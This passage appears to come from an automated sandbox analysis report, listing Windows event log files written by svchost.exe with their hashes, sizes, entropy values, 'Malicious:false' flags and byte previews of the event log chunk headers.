                                                SSDEEP:384:qWhDIEQAGxIHIFIWiIfeIT4IEIIInIhvohIG6IfDIT7IoIEIDIIInI0I9IGsIfnN:qWZxGkilOIRS4
                                                MD5:7CAE980F2C7CE7B4F31DCFD5F768D5BC
                                                SHA1:EB5A09DA7BE0F3FEF7F187B51F558691C3F7D688
                                                SHA-256:C31DFD5044ED07C8E6632891671BE7544A8C784C4434529F9D72459E13EF4AAB
                                                SHA-512:10EE849BE5192BEB1C599647A08E553FC7F403CF50CA4C96A8B1EA50DFF46CE681F447DEC4EBD2E55454ECCC0F37A65DFC4D7FF012CA40F7D17F19F6F6E6C1D7
                                                Malicious:false
                                                Preview:ElfChnk.T...............T.......................h............................................................................6N........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................a........F..........1........................................)..........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8023807109333921
                                                Encrypted:false
                                                SSDEEP:384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
                                                MD5:996D00E5A8B66706691FE697CCD68A7A
                                                SHA1:C90C99232451BAF2DCEB02C56C69CA9194390A9D
                                                SHA-256:95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
                                                SHA-512:FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
                                                Malicious:false
                                                Preview:ElfChnk.....................................`"...#...l]....................................................................upp.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................^...............................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.999253421723821
                                                Encrypted:false
                                                SSDEEP:768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
                                                MD5:11CAFE60067FAE9C5A304C7A7DAC0EB5
                                                SHA1:0E72987588CB8557C7CD00AD3D8956CDC0593C35
                                                SHA-256:1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
                                                SHA-512:764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
                                                Malicious:false
                                                Preview:ElfChnk.....................................0...@......~....................................................................u!..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67176
                                                Entropy (8bit):3.912745595939774
                                                Encrypted:false
                                                SSDEEP:768:kbGhsutDBjV8k+S7eUtHpoVWWnHzLKvc90Xjt0GMAoLx07SZRcZv76NcRUjGHzLc:cVutDBjV8k+S7PtHpoVW
                                                MD5:9E1209159752BCB553A728D0A66840F4
                                                SHA1:0EE970903906E39BEE53880343852556F5D502F7
                                                SHA-256:6AFFC2A5591864145C6CE3EB62A53815064710E02C48B1FA99645C315CE5B7DB
                                                SHA-512:9F2BB2DD68AF947DF525C7DBABDEEE3B62E1B4042ACA85FABAD91837DE81B93D060281AC23B9B2B6143F7F4C72917B3008DEFF7B3FAE9F9D0F4E5B3C72CA2214
                                                Malicious:false
                                                Preview:ElfChnk.................O.......Z...........H.......A.Q......................................................................A ................8...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..h...X........G............E!&...............................................................8.......P.....!..................G.......`......`...4.......X....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L.......... . . h...**......Y.......{.b............E!&...............................................................8.......P...C.!...o...........
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.437741585013902
                                                Encrypted:false
                                                SSDEEP:768:syQjw+1jN2RkG6OQFAWAbYgO0TKLp85lxbW1mCgS:5Qjw+y4AVKLp85S1mCgS
                                                MD5:E303D264B6B0374B9682D9A3817764DC
                                                SHA1:8DEDE4181998E04B4CFB0CFFD73EF66908398C24
                                                SHA-256:C01FD811B9F7C9D5AF92196B62769F52AA4157A573BD4E1EAB675AC79A73380D
                                                SHA-512:2C15E9667398FE2640F0E63244B41E5CA160C0AF5E52F32333A1601C08649FC91F6D2C25FF9668C213B942B655CE1AF92DDD3134B47E3D2A00EA13706BD16DEA
                                                Malicious:false
                                                Preview:ElfChnk.........................................(...B......................................................................... .................v...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................................O...................**.................E............E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7602204514023913
                                                Encrypted:false
                                                SSDEEP:384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
                                                MD5:A71D2A716E4B8C87379C50F91A376243
                                                SHA1:B55D17BCD95C285812D918E820EDC513B8BC4373
                                                SHA-256:4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
                                                SHA-512:4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
                                                Malicious:false
                                                Preview:ElfChnk.........................................8!..=.......................................................................w]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v...............................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.7780335879449853
                                                Encrypted:false
                                                SSDEEP:1536:4XhqUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:4XQnS
                                                MD5:9CCBC3D02460EA12B44E3733DD34BF89
                                                SHA1:5CE2CE08C2F9F7653B0C059ACDE19D8D2962187F
                                                SHA-256:59905EAB56BF3D0172E6952E418864BDF1AC6F0FD3FF3E26BD104FF2B85560C1
                                                SHA-512:EE7E03FA93712648939C4C32B8501532A963663EEC87BAE23C532556F7EEFC56545CA90CC422EACCF01D7B16AC44F7F230567B65E880780C6C7A25D2F9690596
                                                Malicious:false
                                                Preview:ElfChnk.........*...............*...........(N...O.....2......................................................................:.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........=......................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.4655200384785823
                                                Encrypted:false
                                                SSDEEP:768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
                                                MD5:EC1441AF347A3AEBD3C499EB77112044
                                                SHA1:062F0645AF0FF401308A0582362E6FE001C5444F
                                                SHA-256:97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
                                                SHA-512:687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@............{..@}....c.....................................................................].................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&................................................b..........%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):1912
                                                Entropy (8bit):3.5231043941622877
                                                Encrypted:false
                                                SSDEEP:48:MDWUCKOrCK3QkB69DgOCKOrCK3QWkcqrlXl:OCKOrCKgo69DgOCKOrCKgWkcGlXl
                                                MD5:1068FBE8F00EFF2C3C807C57AB4E3FDA
                                                SHA1:F08393AB7A5D45D80316AB27A4CBA6A1D2250D95
                                                SHA-256:8EFB0261D31A98E12B820A167B5C883D3FD2E2AF2726C488D3A5F2E9D681317E
                                                SHA-512:17D4C9CA9B688144DE420AAF4A744EC89EF95E560FAC2062829801AE3B56EE0A3D692963AD7E205E85060F869C9DEC50EF88515BB4208359DE3F728842101285
                                                Malicious:false
                                                Preview:ElfChnk.'.......2.......'.......2............N...Q..........................................................................e0.................^...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................7.......................&...............................................................................**......1........a.............E!&...............................................................L.......b.....!..................a........i....................1....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^7...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.335307911754908
                                                Encrypted:false
                                                SSDEEP:384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
                                                MD5:DEC13E419235D71E66C768AF61C819EB
                                                SHA1:C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
                                                SHA-256:E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
                                                SHA-512:A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
                                                Malicious:false
                                                Preview:ElfChnk.U...............U.............................w..................................................................... j..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................1[..............................&........>......................................y.......................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.470554172113501
                                                Encrypted:false
                                                SSDEEP:1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
                                                MD5:7C2BA3824E6FDFDC9B34997831CF5BA4
                                                SHA1:2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
                                                SHA-256:902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
                                                SHA-512:4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
                                                Malicious:false
                                                Preview:ElfChnk......................................h...i.....n....................................................................n.2.................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..8............C',_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.468620151101956
                                                Encrypted:false
                                                SSDEEP:1536:pj9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizIUxKu/GFy9pUJX:pj9GvEkeLhw6IrKOu4zB5c63VJ7qhFR7
                                                MD5:E88618B1DEA05E7BA0E67923A3BB5A74
                                                SHA1:A304E914984ECB8EDE4083775AD58F3B3F0553FD
                                                SHA-256:8B403D79B42CE87F51D13443DE16B113DF0CD7F84E8E2B263CF54B9059BD29CD
                                                SHA-512:167952B232B09140552F3787D7BA649098A3C4B6A14F73B4A9AC68B164BCDD921996876C791A3057161E042680CE1858B927691ED2C3E6050EC723D0774451CF
                                                Malicious:false
                                                Preview:ElfChnk......... ............... ...........H........P.>.....................................................................S.c................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...............................................................9...&...........................q.......I...................................Q.......**..............t...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.5283250731919766
                                                Encrypted:false
                                                SSDEEP:384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
                                                MD5:9CB77B06F0F33B4BC7A638085998A032
                                                SHA1:04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
                                                SHA-256:AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
                                                SHA-512:488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
                                                Malicious:false
                                                Preview:ElfChnk.....................................0y...{.._N......................................................................%.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-@..............E9..m...................&.......................................................->......................**..8...........D...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.268440759929627
                                                Encrypted:false
                                                SSDEEP:384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
                                                MD5:3E6903B4F529505011694E65B60A9154
                                                SHA1:05BC372041FD161154C35F843BFE439066F3A6C6
                                                SHA-256:E7BB68D43D88025FC2EC47BCA4957A08CEDF53FAA24751D95019CEF867223393
                                                SHA-512:8C700C45A3A01A79F9E0AB74BE5C0E718E231AAD4395F631A3DADA5C83E937EEBD0804DB0AF340A341440414ACD9293713B9ECB1A074F5E794CA21DFAB8D8CA0
                                                Malicious:false
                                                Preview:ElfChnk.........?...............?............q...s..>O......................................................................C.*.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6^..............................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8178355996317889
                                                Encrypted:false
                                                SSDEEP:384:HhGuZumutu4uEu5uOuDuyb2uPu1uuuCeuDu7utu:HD
                                                MD5:FFB7825ACA321A39E4DD495EC4B7E3BE
                                                SHA1:A4EBE4617E4B98D93FDE5546893A4D29441B5F44
                                                SHA-256:F56C28857B0E8D30F34089306B9CCF6655F7ED073412E710AB10D747092DA0D2
                                                SHA-512:86D7C252C870B9362394CFA35B99AE257228E477A5346D8EF5B91E81F3A78CD008DC52A5F3D12C395EFB715F82B849CAD805AD71CF8C58514614F83EACB4F63E
                                                Malicious:false
                                                Preview:ElfChnk......................................"...$....u.....................................................................v..C................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......>...............................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.075909180265887
                                                Encrypted:false
                                                SSDEEP:384:NhzAsAvAaAmANSAbNAQAfCHA+AHchArAXATAvAjALATABAtGABS78jAOAqA4eAEp:NGCs2k64i/tpqA
                                                MD5:3A282029B03747ACB9F0A3496C717BD9
                                                SHA1:705490A345F883E024CC1641981A90DA6EDADCF5
                                                SHA-256:2A94A3FFC2481031F58367AB9F99D7972299D7F537520D2A6318B1BAA6B158F8
                                                SHA-512:F98AEB35B035B10B5C3CCA876E445D502AD84F66BE857B17EFE715983F9834ECAEDCCE5FF03914853115DE1644E9541FF111BD79A3607FA707735546A0C04AD4
                                                Malicious:false
                                                Preview:ElfChnk.....................................H.......}{........................................................................dE................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F............................+.......................%..............&...............................................................................**..............|..3_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.162414582102809
                                                Encrypted:false
                                                SSDEEP:384:khVpW2pPkpPrpPepP1pP4pPHpPypPxpPYpPDpPypPlpPct1pPnpPsLpPAWpPQpPT:k+tZb
                                                MD5:0D76B94CB673E07C9297775F6635BB30
                                                SHA1:42037C8D133B4CD395BA6BDC1108C30882248866
                                                SHA-256:7133E41E960AD5F46294DCBDC3FFE8CFCFD120213DF680017947924D3C013A8B
                                                SHA-512:9E5D104332631EDBCB8AF55BCEA2CD7B7EB34A0FE1DF226579E005A775840CDF05C86CCBEF902730138ED1A27347B4FB070FAF37046320740009CC11BAC11C33
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'...................u..4.................................................................... ...........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**...............h{.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.217583590897775
                                                Encrypted:false
                                                SSDEEP:384:3hUIpGcRpDvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:3YDoh1VLBCVz6t0o3ZeF9UBlG
                                                MD5:C5BB06A11AA8E33C5D2512146A14F414
                                                SHA1:BCA1D0ABD07806B4DDB34B4483B04B57A840CC26
                                                SHA-256:5A42653C87D73E415D15B08AE3511312F991238224022920D85CDEE43316C64A
                                                SHA-512:8FE28DAC0CEB3BBB462390492FA7623077448CCD58E04EE38C6CE9FF92FAD6647176DD61A628A4C03C3C5DEE9912D67375AE77865DE52D23B2B253C01C43FC86
                                                Malicious:false
                                                Preview:ElfChnk.........................................P......a.................................................................... ..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..............T.0.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1666137709834492
                                                Encrypted:false
                                                SSDEEP:384:uwhwCCRzCaCkClCzCYC/CyCVCGCMCvCzCw9CdqCVCICsC:uwKFT
                                                MD5:88E290384531AC91E63C802B158E726D
                                                SHA1:2AFD218C14B290A33DC27B0BDBA87AADFD428D9B
                                                SHA-256:36B48D00709B0F3B917927DE97D395C4785F6A7B61CCC5C72C799C4521FD9D97
                                                SHA-512:7969E4BDC2659D8412FD187135AB04B329AE134E2A5E386D86BA0E490F979621DCE05DF1118FA31987CB5FD27CB964773F4A67D6884002F7E9579A752E5A2AAD
                                                Malicious:false
                                                Preview:ElfChnk.....................................84..p6..........................................................................Pl..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................v)........................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.528410746340457
                                                Encrypted:false
                                                SSDEEP:384:ShEKKeKSrlKvKe2KfKSKSMchY5MtYwMtYPMRYrJMRYgqMRYYqIMDH6MgMahMLMeB:SuWrGSqH1xh9AaBn
                                                MD5:21A71BAB626CE9549A5130786AB2B438
                                                SHA1:85364794F49109F65F2C3D4514C7EB2EB80F9EE5
                                                SHA-256:6A0BC7E6EC4A9DC7F1DAADFBBA1F374915F00F507A5356D1A8A6580679630B29
                                                SHA-512:729EF74AD8F80BCB444BE64F3FF005D751337B1E603AC8E476A34148B9C62E239BF87A4477E70ED4571F2AB2429F41FBE766630B1758B6B5BC742185F5B1BBCF
                                                Malicious:false
                                                Preview:ElfChnk.33......F3......33......F3..........P8..X;...idr..................................................................../.{p................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................%,......&.......................K.......................................................**......33..........a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1821673700851167
                                                Encrypted:false
